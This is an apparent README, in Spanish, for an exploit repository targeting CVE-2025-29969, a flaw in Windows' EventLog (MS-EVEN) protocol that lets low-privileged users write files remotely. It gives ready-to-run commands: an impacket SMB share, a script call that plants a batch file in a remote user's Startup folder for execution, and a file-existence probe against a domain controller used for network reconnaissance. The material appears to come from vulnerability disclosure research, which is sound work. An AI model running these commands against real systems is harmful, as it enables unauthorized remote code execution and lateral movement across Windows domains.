
Explotación de CVE-2025-29969
EventLogin es una vulnerabilidad de tiempo de verificación a tiempo de uso en el protocolo MS-EVEN. La vulnerabilidad permite a usuarios con bajos privilegios escribir archivos arbitrarios en una máquina remota, evitando efectivamente la necesidad de una cuenta de Administrador para una escritura remota.
Hay dos scripts en este repositorio: uno explota la vulnerabilidad (write_file_remotely.py) y el otro utiliza una de las primitivas de la vulnerabilidad para verificar si un archivo remoto existe o no, como un usuario con bajos privilegios, lo cual es útil, por ejemplo, para ver programas instalados en otros equipos del dominio.
Puedes leer el análisis completo aquí:
EventLog-in: Propagando con Credenciales Débiles Usando el Servicio de Eventlog en Microsoft Windows
Primero, crea un recurso compartido SMB usando impacket:
impacket-smbserver -smb2support Share /tmp/safebreach
Nota: el script usa 'Share' como nombre del recurso compartido codificado, modifícalo si es necesario.
Luego, ejecuta el script write_file_remotely.py e incluye todos los parámetros requeridos:
Ejemplo:
python write_file_remotely.py 192.168.56.102 192.168.56.105 lowuser Test123 "/tmp/safebreach/Sample.evtx" "calc.bat" "C:\\Users\\lowuser\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\target.bat"
Este script no utiliza la vulnerabilidad en sí, solo emplea la primitiva 'CreateFile' y puede ayudarte a reconocer la red.
Por ejemplo, el directorio Program Files de una máquina remota en un dominio es accesible para todo el grupo 'Users', lo que significa que usando credenciales de CUALQUIER usuario puedes verificar si un archivo existe o no en otra máquina.
Acepta los siguientes parámetros:
Por ejemplo, verifica si wireshark está instalado en el DC (192.168.56.57) usando un usuario con bajos privilegios.
python check_if_exists.py 192.168.56.57 lowuser Password1! "C:\Program Files\Wireshark"
Result:
FILE_EXISTS_AND_IS_DIRECTORY